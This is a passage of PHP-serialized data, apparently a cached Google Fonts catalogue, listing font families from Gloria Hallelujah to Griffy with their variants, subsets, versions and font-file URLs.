Hallelujah\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v17\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:92:\"http://fonts.gstatic.com/s/gloriahallelujah/v17/LYjYdHv3kUk9BMV96EIswT9DIbW-MLSy3TKEvkCF.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:460;O:8:\"stdClass\":8:{s:6:\"family\";s:5:\"Glory\";s:8:\"variants\";a:16:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:7:\"regular\";i:4;s:3:\"500\";i:5;s:3:\"600\";i:6;s:3:\"700\";i:7;s:3:\"800\";i:8;s:9:\"100italic\";i:9;s:9:\"200italic\";i:10;s:9:\"300italic\";i:11;s:6:\"italic\";i:12;s:9:\"500italic\";i:13;s:9:\"600italic\";i:14;s:9:\"700italic\";i:15;s:9:\"800italic\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:2:\"v9\";s:12:\"lastModified\";s:10:\"2022-07-12\";s:5:\"files\";O:8:\"stdClass\":16:{s:3:\"100\";s:82:\"http://fonts.gstatic.com/s/glory/v9/q5uasoi9Lf1w5t3Est24nq9blIRQwIiDpn-dDi9EOQ.ttf\";s:3:\"200\";s:82:\"http://fonts.gstatic.com/s/glory/v9/q5uasoi9Lf1w5t3Est24nq9blIRQQImDpn-dDi9EOQ.ttf\";s:3:\"300\";s:82:\"http://fonts.gstatic.com/s/glory/v9/q5uasoi9Lf1w5t3Est24nq9blIRQnomDpn-dDi9EOQ.ttf\";s:7:\"regular\";s:82:\"http://fonts.gstatic.com/s/glory/v9/q5uasoi9Lf1w5t3Est24nq9blIRQwImDpn-dDi9EOQ.ttf\";s:3:\"500\";s:82:\"http://fonts.gstatic.com/s/glory/v9/q5uasoi9Lf1w5t3Est24nq9blIRQ8omDpn-dDi9EOQ.ttf\";s:3:\"600\";s:82:\"http://fonts.gstatic.com/s/glory/v9/q5uasoi9Lf1w5t3Est24nq9blIRQHo6Dpn-dDi9EOQ.ttf\";s:3:\"700\";s:82:\"http://fonts.gstatic.com/s/glory/v9/q5uasoi9Lf1w5t3Est24nq9blIRQJ46Dpn-dDi9EOQ.ttf\";s:3:\"800\";s:82:\"http://fonts.gstatic.com/s/glory/v9/q5uasoi9Lf1w5t3Est24nq9blIRQQI6Dpn-dDi9EOQ.ttf\";s:9:\"100italic\";s:84:\"http://fonts.gstatic.com/s/glory/v9/q5uYsoi9Lf1w5vfNgCJg98TBOoNFCMpr5HWZLCpUOaM6.ttf\";s:9:\"200italic\";s:84:\"http://fonts.gstatic.com/s/glory/v9/q5uYsoi9Lf1w5vfNgCJg98TBOoNFCMrr5XWZLCpUOaM6.ttf\";s:9:\"300italic\";s:84:\"http://fonts.gstatic.com/s/glory/v9/q5uYsoi9Lf1w5vfNgCJg98TBOoNFCMo15XWZLCpUOaM6.ttf\";s:6:\"italic\";s:84:\"http://fonts.gstatic.com/s/glory/v9/q5uYsoi9Lf1w5vfNgCJg98TBOoNFCMpr5XWZLCpUOaM6.ttf\";s:9:\"500italic\";s:84:\"http://fonts.gstatic.com/s/glory/v9/q5uYsoi9Lf1w5vfNgCJg98TBOoNFCMpZ5XWZLCpUOaM6.ttf\";s:9:\"600italic\";s:84:\"http://fonts.gstatic.com/s/glory/v9/q5uYsoi9Lf1w5vfNgCJg98TBOoNFCMq14nWZLCpUOaM6.ttf\";s:9:\"700italic\";s:84:\"http://fonts.gstatic.com/s/glory/v9/q5uYsoi9Lf1w5vfNgCJg98TBOoNFCMqM4nWZLCpUOaM6.ttf\";s:9:\"800italic\";s:84:\"http://fonts.gstatic.com/s/glory/v9/q5uYsoi9Lf1w5vfNgCJg98TBOoNFCMrr4nWZLCpUOaM6.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:461;O:8:\"stdClass\":8:{s:6:\"family\";s:6:\"Gluten\";s:8:\"variants\";a:9:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:7:\"regular\";i:4;s:3:\"500\";i:5;s:3:\"600\";i:6;s:3:\"700\";i:7;s:3:\"800\";i:8;s:3:\"900\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:2:\"v9\";s:12:\"lastModified\";s:10:\"2022-06-28\";s:5:\"files\";O:8:\"stdClass\":9:{s:3:\"100\";s:101:\"http://fonts.gstatic.com/s/gluten/v9/Hhy_U5gk9fW7OUdVIPh2zD_RSqQJ__A15jgJsn-Bhb_yI8Vb7B1Luni7ciJh.ttf\";s:3:\"200\";s:101:\"http://fonts.gstatic.com/s/gluten/v9/Hhy_U5gk9fW7OUdVIPh2zD_RSqQJ__A15jgJsn-Bhb_yI8Xb7R1Luni7ciJh.ttf\";s:3:\"300\";s:101:\"http://fonts.gstatic.com/s/gluten/v9/Hhy_U5gk9fW7OUdVIPh2zD_RSqQJ__A15jgJsn-Bhb_yI8UF7R1Luni7ciJh.ttf\";s:7:\"regular\";s:101:\"http://fonts.gstatic.com/s/gluten/v9/Hhy_U5gk9fW7OUdVIPh2zD_RSqQJ__A15jgJsn-Bhb_yI8Vb7R1Luni7ciJh.ttf\";s:3:\"500\";s:101:\"http://fonts.gstatic.com/s/gluten/v9/Hhy_U5gk9fW7OUdVIPh2zD_RSqQJ__A15jgJsn-Bhb_yI8Vp7R1Luni7ciJh.ttf\";s:3:\"600\";s:101:\"http://fonts.gstatic.com/s/gluten/v9/Hhy_U5gk9fW7OUdVIPh2zD_RSqQJ__A15jgJsn-Bhb_yI8WF6h1Luni7ciJh.ttf\";s:3:\"700\";s:101:\"http://fonts.gstatic.com/s/gluten/v9/Hhy_U5gk9fW7OUdVIPh2zD_RSqQJ__A15jgJsn-Bhb_yI8W86h1Luni7ciJh.ttf\";s:3:\"800\";s:101:\"http://fonts.gstatic.com/s/gluten/v9/Hhy_U5gk9fW7OUdVIPh2zD_RSqQJ__A15jgJsn-Bhb_yI8Xb6h1Luni7ciJh.ttf\";s:3:\"900\";s:101:\"http://fonts.gstatic.com/s/gluten/v9/Hhy_U5gk9fW7OUdVIPh2zD_RSqQJ__A15jgJsn-Bhb_yI8Xy6h1Luni7ciJh.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:462;O:8:\"stdClass\":8:{s:6:\"family\";s:10:\"Goblin One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v22\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:76:\"http://fonts.gstatic.com/s/goblinone/v22/CSR64z1ZnOqZRjRCBVY_TOcATNt_pOU.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:463;O:8:\"stdClass\":8:{s:6:\"family\";s:10:\"Gochi Hand\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v16\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:76:\"http://fonts.gstatic.com/s/gochihand/v16/hES06XlsOjtJsgCkx1PkTo71-n0nXWA.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:464;O:8:\"stdClass\":8:{s:6:\"family\";s:7:\"Goldman\";s:8:\"variants\";a:2:{i:0;s:7:\"regular\";i:1;s:3:\"700\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v15\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":2:{s:7:\"regular\";s:70:\"http://fonts.gstatic.com/s/goldman/v15/pe0uMIWbN4JFplR2LDJ4Bt-7G98.ttf\";s:3:\"700\";s:74:\"http://fonts.gstatic.com/s/goldman/v15/pe0rMIWbN4JFplR2FI5XIteQB9Zra1U.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:465;O:8:\"stdClass\":8:{s:6:\"family\";s:8:\"Gorditas\";s:8:\"variants\";a:2:{i:0;s:7:\"regular\";i:1;s:3:\"700\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v20\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":2:{s:7:\"regular\";s:72:\"http://fonts.gstatic.com/s/gorditas/v20/ll8_K2aTVD26DsPEtQDoDa4AlxYb.ttf\";s:3:\"700\";s:76:\"http://fonts.gstatic.com/s/gorditas/v20/ll84K2aTVD26DsPEtThUIooIvAoShA1i.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:466;O:8:\"stdClass\":8:{s:6:\"family\";s:9:\"Gothic A1\";s:8:\"variants\";a:9:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:7:\"regular\";i:4;s:3:\"500\";i:5;s:3:\"600\";i:6;s:3:\"700\";i:7;s:3:\"800\";i:8;s:3:\"900\";}s:7:\"subsets\";a:2:{i:0;s:6:\"korean\";i:1;s:5:\"latin\";}s:7:\"version\";s:3:\"v13\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":9:{s:3:\"100\";s:76:\"http://fonts.gstatic.com/s/gothica1/v13/CSR74z5ZnPydRjlCCwlCCMcqYtd2vfwk.ttf\";s:3:\"200\";s:78:\"http://fonts.gstatic.com/s/gothica1/v13/CSR44z5ZnPydRjlCCwlCpOYKSPl6tOU9Eg.ttf\";s:3:\"300\";s:78:\"http://fonts.gstatic.com/s/gothica1/v13/CSR44z5ZnPydRjlCCwlCwOUKSPl6tOU9Eg.ttf\";s:7:\"regular\";s:74:\"http://fonts.gstatic.com/s/gothica1/v13/CSR94z5ZnPydRjlCCwl6bM0uQNJmvQ.ttf\";s:3:\"500\";s:78:\"http://fonts.gstatic.com/s/gothica1/v13/CSR44z5ZnPydRjlCCwlCmOQKSPl6tOU9Eg.ttf\";s:3:\"600\";s:78:\"http://fonts.gstatic.com/s/gothica1/v13/CSR44z5ZnPydRjlCCwlCtOMKSPl6tOU9Eg.ttf\";s:3:\"700\";s:78:\"http://fonts.gstatic.com/s/gothica1/v13/CSR44z5ZnPydRjlCCwlC0OIKSPl6tOU9Eg.ttf\";s:3:\"800\";s:78:\"http://fonts.gstatic.com/s/gothica1/v13/CSR44z5ZnPydRjlCCwlCzOEKSPl6tOU9Eg.ttf\";s:3:\"900\";s:78:\"http://fonts.gstatic.com/s/gothica1/v13/CSR44z5ZnPydRjlCCwlC6OAKSPl6tOU9Eg.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:467;O:8:\"stdClass\":8:{s:6:\"family\";s:4:\"Gotu\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:4:{i:0;s:10:\"devanagari\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";i:3;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v14\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:63:\"http://fonts.gstatic.com/s/gotu/v14/o-0FIpksx3QOlH0Lioh6-hU.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:468;O:8:\"stdClass\":8:{s:6:\"family\";s:21:\"Goudy Bookletter 1911\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v15\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:101:\"http://fonts.gstatic.com/s/goudybookletter1911/v15/sykt-z54laciWfKv-kX8krex0jDiD2HbY6I5tRbXZ4IXAA.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:469;O:8:\"stdClass\":8:{s:6:\"family\";s:12:\"Gowun Batang\";s:8:\"variants\";a:2:{i:0;s:7:\"regular\";i:1;s:3:\"700\";}s:7:\"subsets\";a:4:{i:0;s:6:\"korean\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";i:3;s:10:\"vietnamese\";}s:7:\"version\";s:2:\"v7\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":2:{s:7:\"regular\";s:80:\"http://fonts.gstatic.com/s/gowunbatang/v7/ijwSs5nhRMIjYsdSgcMa3wRhXLH-yuAtLw.ttf\";s:3:\"700\";s:84:\"http://fonts.gstatic.com/s/gowunbatang/v7/ijwNs5nhRMIjYsdSgcMa3wRZ4J7awssxJii23w.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:470;O:8:\"stdClass\":8:{s:6:\"family\";s:11:\"Gowun Dodum\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:4:{i:0;s:6:\"korean\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";i:3;s:10:\"vietnamese\";}s:7:\"version\";s:2:\"v7\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:77:\"http://fonts.gstatic.com/s/gowundodum/v7/3Jn5SD_00GqwlBnWc1TUJF0FfORL0fNy.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:471;O:8:\"stdClass\":8:{s:6:\"family\";s:8:\"Graduate\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v13\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:72:\"http://fonts.gstatic.com/s/graduate/v13/C8cg4cs3o2n15t_2YxgR6X2NZAn2.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:472;O:8:\"stdClass\":8:{s:6:\"family\";s:11:\"Grand Hotel\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v13\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:78:\"http://fonts.gstatic.com/s/grandhotel/v13/7Au7p_IgjDKdCRWuR1azpmQNEl0O0kEx.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:473;O:8:\"stdClass\":8:{s:6:\"family\";s:12:\"Grandstander\";s:8:\"variants\";a:18:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:7:\"regular\";i:4;s:3:\"500\";i:5;s:3:\"600\";i:6;s:3:\"700\";i:7;s:3:\"800\";i:8;s:3:\"900\";i:9;s:9:\"100italic\";i:10;s:9:\"200italic\";i:11;s:9:\"300italic\";i:12;s:6:\"italic\";i:13;s:9:\"500italic\";i:14;s:9:\"600italic\";i:15;s:9:\"700italic\";i:16;s:9:\"800italic\";i:17;s:9:\"900italic\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v11\";s:12:\"lastModified\";s:10:\"2022-07-12\";s:5:\"files\";O:8:\"stdClass\":18:{s:3:\"100\";s:99:\"http://fonts.gstatic.com/s/grandstander/v11/ga6fawtA-GpSsTWrnNHPCSIMZhhKpFjyNZIQD1-_D3jWttFGmQk.ttf\";s:3:\"200\";s:99:\"http://fonts.gstatic.com/s/grandstander/v11/ga6fawtA-GpSsTWrnNHPCSIMZhhKpFjyNZIQD9--D3jWttFGmQk.ttf\";s:3:\"300\";s:99:\"http://fonts.gstatic.com/s/grandstander/v11/ga6fawtA-GpSsTWrnNHPCSIMZhhKpFjyNZIQDwG-D3jWttFGmQk.ttf\";s:7:\"regular\";s:99:\"http://fonts.gstatic.com/s/grandstander/v11/ga6fawtA-GpSsTWrnNHPCSIMZhhKpFjyNZIQD1--D3jWttFGmQk.ttf\";s:3:\"500\";s:99:\"http://fonts.gstatic.com/s/grandstander/v11/ga6fawtA-GpSsTWrnNHPCSIMZhhKpFjyNZIQD22-D3jWttFGmQk.ttf\";s:3:\"600\";s:99:\"http://fonts.gstatic.com/s/grandstander/v11/ga6fawtA-GpSsTWrnNHPCSIMZhhKpFjyNZIQD4G5D3jWttFGmQk.ttf\";s:3:\"700\";s:99:\"http://fonts.gstatic.com/s/grandstander/v11/ga6fawtA-GpSsTWrnNHPCSIMZhhKpFjyNZIQD7i5D3jWttFGmQk.ttf\";s:3:\"800\";s:99:\"http://fonts.gstatic.com/s/grandstander/v11/ga6fawtA-GpSsTWrnNHPCSIMZhhKpFjyNZIQD9-5D3jWttFGmQk.ttf\";s:3:\"900\";s:99:\"http://fonts.gstatic.com/s/grandstander/v11/ga6fawtA-GpSsTWrnNHPCSIMZhhKpFjyNZIQD_a5D3jWttFGmQk.ttf\";s:9:\"100italic\";s:102:\"http://fonts.gstatic.com/s/grandstander/v11/ga6ZawtA-GpSsTWrnNHPCSImbyq1fDGZrzwXGpf95zrcsvNDiQlBYQ.ttf\";s:9:\"200italic\";s:102:\"http://fonts.gstatic.com/s/grandstander/v11/ga6ZawtA-GpSsTWrnNHPCSImbyq1fDGZrzwXGpf9ZzvcsvNDiQlBYQ.ttf\";s:9:\"300italic\";s:102:\"http://fonts.gstatic.com/s/grandstander/v11/ga6ZawtA-GpSsTWrnNHPCSImbyq1fDGZrzwXGpf9uTvcsvNDiQlBYQ.ttf\";s:6:\"italic\";s:102:\"http://fonts.gstatic.com/s/grandstander/v11/ga6ZawtA-GpSsTWrnNHPCSImbyq1fDGZrzwXGpf95zvcsvNDiQlBYQ.ttf\";s:9:\"500italic\";s:102:\"http://fonts.gstatic.com/s/grandstander/v11/ga6ZawtA-GpSsTWrnNHPCSImbyq1fDGZrzwXGpf91TvcsvNDiQlBYQ.ttf\";s:9:\"600italic\";s:102:\"http://fonts.gstatic.com/s/grandstander/v11/ga6ZawtA-GpSsTWrnNHPCSImbyq1fDGZrzwXGpf9OTzcsvNDiQlBYQ.ttf\";s:9:\"700italic\";s:102:\"http://fonts.gstatic.com/s/grandstander/v11/ga6ZawtA-GpSsTWrnNHPCSImbyq1fDGZrzwXGpf9ADzcsvNDiQlBYQ.ttf\";s:9:\"800italic\";s:102:\"http://fonts.gstatic.com/s/grandstander/v11/ga6ZawtA-GpSsTWrnNHPCSImbyq1fDGZrzwXGpf9ZzzcsvNDiQlBYQ.ttf\";s:9:\"900italic\";s:102:\"http://fonts.gstatic.com/s/grandstander/v11/ga6ZawtA-GpSsTWrnNHPCSImbyq1fDGZrzwXGpf9TjzcsvNDiQlBYQ.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:474;O:8:\"stdClass\":8:{s:6:\"family\";s:10:\"Grape Nuts\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:2:\"v2\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:75:\"http://fonts.gstatic.com/s/grapenuts/v2/syk2-yF4iLM2RfKj4F7k3tLvol2RN1E.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:475;O:8:\"stdClass\":8:{s:6:\"family\";s:12:\"Gravitas One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v15\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:81:\"http://fonts.gstatic.com/s/gravitasone/v15/5h1diZ4hJ3cblKy3LWakKQmaDWRNr3DzbQ.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:476;O:8:\"stdClass\":8:{s:6:\"family\";s:11:\"Great Vibes\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v14\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:78:\"http://fonts.gstatic.com/s/greatvibes/v14/RWmMoKWR9v4ksMfaWd_JN-XCg6UKDXlq.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:477;O:8:\"stdClass\":8:{s:6:\"family\";s:14:\"Grechen Fuemen\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:2:\"v7\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:84:\"http://fonts.gstatic.com/s/grechenfuemen/v7/vEFI2_tHEQ4d5ObgKxBzZh0MAWgc-NaXXq7H.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:478;O:8:\"stdClass\":8:{s:6:\"family\";s:6:\"Grenze\";s:8:\"variants\";a:18:{i:0;s:3:\"100\";i:1;s:9:\"100italic\";i:2;s:3:\"200\";i:3;s:9:\"200italic\";i:4;s:3:\"300\";i:5;s:9:\"300italic\";i:6;s:7:\"regular\";i:7;s:6:\"italic\";i:8;s:3:\"500\";i:9;s:9:\"500italic\";i:10;s:3:\"600\";i:11;s:9:\"600italic\";i:12;s:3:\"700\";i:13;s:9:\"700italic\";i:14;s:3:\"800\";i:15;s:9:\"800italic\";i:16;s:3:\"900\";i:17;s:9:\"900italic\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v14\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":18:{s:3:\"100\";s:70:\"http://fonts.gstatic.com/s/grenze/v14/O4ZRFGb7hR12BxqPm2IjuAkalnmd.ttf\";s:9:\"100italic\";s:73:\"http://fonts.gstatic.com/s/grenze/v14/O4ZXFGb7hR12BxqH_VpHsg04k2md0kI.ttf\";s:3:\"200\";s:72:\"http://fonts.gstatic.com/s/grenze/v14/O4ZQFGb7hR12BxqPN0MDkicWn2CEyw.ttf\";s:9:\"200italic\";s:74:\"http://fonts.gstatic.com/s/grenze/v14/O4ZWFGb7hR12BxqH_Vrrky0SvWWUy1uW.ttf\";s:3:\"300\";s:72:\"http://fonts.gstatic.com/s/grenze/v14/O4ZQFGb7hR12BxqPU0ADkicWn2CEyw.ttf\";s:9:\"300italic\";s:74:\"http://fonts.gstatic.com/s/grenze/v14/O4ZWFGb7hR12BxqH_VqPkC0SvWWUy1uW.ttf\";s:7:\"regular\";s:68:\"http://fonts.gstatic.com/s/grenze/v14/O4ZTFGb7hR12Bxq3_2gnmgwKlg.ttf\";s:6:\"italic\";s:70:\"http://fonts.gstatic.com/s/grenze/v14/O4ZRFGb7hR12BxqH_WIjuAkalnmd.ttf\";s:3:\"500\";s:72:\"http://fonts.gstatic.com/s/grenze/v14/O4ZQFGb7hR12BxqPC0EDkicWn2CEyw.ttf\";s:9:\"500italic\";s:74:\"http://fonts.gstatic.com/s/grenze/v14/O4ZWFGb7hR12BxqH_VrXkS0SvWWUy1uW.ttf\";s:3:\"600\";s:72:\"http://fonts.gstatic.com/s/grenze/v14/O4ZQFGb7hR12BxqPJ0YDkicWn2CEyw.ttf\";s:9:\"600italic\";s:74:\"http://fonts.gstatic.com/s/grenze/v14/O4ZWFGb7hR12BxqH_Vr7li0SvWWUy1uW.ttf\";s:3:\"700\";s:72:\"http://fonts.gstatic.com/s/grenze/v14/O4ZQFGb7hR12BxqPQ0cDkicWn2CEyw.ttf\";s:9:\"700italic\";s:74:\"http://fonts.gstatic.com/s/grenze/v14/O4ZWFGb7hR12BxqH_Vqfly0SvWWUy1uW.ttf\";s:3:\"800\";s:72:\"http://fonts.gstatic.com/s/grenze/v14/O4ZQFGb7hR12BxqPX0QDkicWn2CEyw.ttf\";s:9:\"800italic\";s:74:\"http://fonts.gstatic.com/s/grenze/v14/O4ZWFGb7hR12BxqH_VqDlC0SvWWUy1uW.ttf\";s:3:\"900\";s:72:\"http://fonts.gstatic.com/s/grenze/v14/O4ZQFGb7hR12BxqPe0UDkicWn2CEyw.ttf\";s:9:\"900italic\";s:74:\"http://fonts.gstatic.com/s/grenze/v14/O4ZWFGb7hR12BxqH_VqnlS0SvWWUy1uW.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:479;O:8:\"stdClass\":8:{s:6:\"family\";s:14:\"Grenze Gotisch\";s:8:\"variants\";a:9:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:7:\"regular\";i:4;s:3:\"500\";i:5;s:3:\"600\";i:6;s:3:\"700\";i:7;s:3:\"800\";i:8;s:3:\"900\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v12\";s:12:\"lastModified\";s:10:\"2022-07-12\";s:5:\"files\";O:8:\"stdClass\":9:{s:3:\"100\";s:103:\"http://fonts.gstatic.com/s/grenzegotisch/v12/Fh4hPjjqNDz1osh_jX9YfjudpBJBNV5y5wf_k1i5Lz5UcICdYPSd_w.ttf\";s:3:\"200\";s:103:\"http://fonts.gstatic.com/s/grenzegotisch/v12/Fh4hPjjqNDz1osh_jX9YfjudpBJBNV5y5wf_k1i5rz9UcICdYPSd_w.ttf\";s:3:\"300\";s:103:\"http://fonts.gstatic.com/s/grenzegotisch/v12/Fh4hPjjqNDz1osh_jX9YfjudpBJBNV5y5wf_k1i5cT9UcICdYPSd_w.ttf\";s:7:\"regular\";s:103:\"http://fonts.gstatic.com/s/grenzegotisch/v12/Fh4hPjjqNDz1osh_jX9YfjudpBJBNV5y5wf_k1i5Lz9UcICdYPSd_w.ttf\";s:3:\"500\";s:103:\"http://fonts.gstatic.com/s/grenzegotisch/v12/Fh4hPjjqNDz1osh_jX9YfjudpBJBNV5y5wf_k1i5HT9UcICdYPSd_w.ttf\";s:3:\"600\";s:103:\"http://fonts.gstatic.com/s/grenzegotisch/v12/Fh4hPjjqNDz1osh_jX9YfjudpBJBNV5y5wf_k1i58ThUcICdYPSd_w.ttf\";s:3:\"700\";s:103:\"http://fonts.gstatic.com/s/grenzegotisch/v12/Fh4hPjjqNDz1osh_jX9YfjudpBJBNV5y5wf_k1i5yDhUcICdYPSd_w.ttf\";s:3:\"800\";s:103:\"http://fonts.gstatic.com/s/grenzegotisch/v12/Fh4hPjjqNDz1osh_jX9YfjudpBJBNV5y5wf_k1i5rzhUcICdYPSd_w.ttf\";s:3:\"900\";s:103:\"http://fonts.gstatic.com/s/grenzegotisch/v12/Fh4hPjjqNDz1osh_jX9YfjudpBJBNV5y5wf_k1i5hjhUcICdYPSd_w.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:480;O:8:\"stdClass\":8:{s:6:\"family\";s:7:\"Grey Qo\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:2:\"v7\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:68:\"http://fonts.gstatic.com/s/greyqo/v7/BXRrvF_Nmv_TyXxNDOtQ9Wf0QcE.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:481;O:8:\"stdClass\":8:{s:6:\"family\";s:6:\"Griffy\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v21\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:68:\"http://fonts.gstatic.com/s/griffy/v21/FwZa7-ox2FQh9kf